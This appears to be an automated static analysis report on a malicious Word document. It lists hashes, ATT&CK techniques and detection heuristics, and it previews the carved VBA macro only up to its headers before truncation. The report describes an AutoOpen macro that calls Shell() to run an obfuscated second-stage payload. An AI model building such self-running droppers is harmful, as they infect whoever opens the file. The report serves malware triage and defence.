Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42aadbfd6a8d4f11…

MALICIOUS

Office (OLE)

Size: 81.5 KB
Created: 2017-10-31 16:33:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 66e98c2519905af2b2157818ee5ab1ea
SHA-1: 10426f498029a27bba83b033fc9b52908fdf0e21
SHA-256: 42aadbfd6a8d4f1136830aadf2653f1c057e8d5d1672a73f17721e6b0aba103a
Risk Score: 184

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and utilizes the Shell() function, indicating an attempt to execute arbitrary code. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The macro itself is heavily obfuscated, but its primary function appears to be the execution of a second-stage payload.

Heuristics 7

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11594 bytes
SHA-256: eb0b9023d7fc74af3c04232e826167d592669f74f396101c8cbda0842a73d8c8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 24 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fsbNqDFvZ"
Function ucCVBiZIJ()

... (truncated)